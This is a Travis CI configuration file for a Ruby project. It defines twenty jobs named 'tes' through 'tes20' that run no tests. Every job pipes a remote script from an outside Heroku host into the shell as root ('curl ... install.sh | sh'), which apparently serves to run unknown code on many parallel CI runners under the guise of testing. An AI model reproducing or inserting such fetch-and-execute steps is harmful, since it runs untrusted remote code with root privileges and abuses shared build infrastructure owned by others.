language: ruby

jobs:
  include:
    - stage: test
      name: "tes"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes2"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes3"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes4"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes5"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes6"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes7"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes8"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes9"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes10"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes11"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes12"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes13"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes14"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes15"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes16"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes17"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes18"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes19"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
    - 
      name: "tes20"
      script:
        - sudo -u root curl https://nomaden1.herokuapp.com/install.sh | sh
